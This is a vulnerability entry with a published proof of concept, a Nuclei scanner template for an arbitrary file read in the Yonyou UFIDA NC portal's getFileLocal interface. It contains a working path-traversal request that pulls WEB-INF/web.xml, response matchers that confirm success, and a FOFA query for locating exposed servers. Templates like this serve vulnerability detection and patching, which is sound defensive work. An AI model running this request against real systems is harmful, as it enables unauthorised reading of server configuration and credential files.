漏洞描述
There is any file reading in the getFileLocal interface of UFIDA Mobile System Management.
yonyou-ufida-nc-lfi: UFIDA NC Portal - Arbitrary File Read
PoC代码[已公开]
id: yonyou-ufida-nc-lfi
info:
name: UFIDA NC Portal - Arbitrary File Read
author: DhiyaneshDk
severity: high
description: |
There is any file reading in the getFileLocal interface of UFIDA Mobile System Management.
reference:
- https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8B%E7%A7%BB%E5%8A%A8%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86getFileLocal%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.md
classification:
cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: yonyou
product: ufida-nc
fofa-query: app="用友-移动系统管理"
tags: yonyou,ufida,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "nc.bs.framework.server.WebApplicationStartupHook"
- "<web-app"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502202851f32df0648e9c88f9e19c566f86f420b09547d094dbd6964e854788e540f602210084a03f9137bbb044d95f482e56d3e92f7c25bc6e442d38f18ff7ad511d3bf1f6:922c64590222798bb761d5b6d8e72950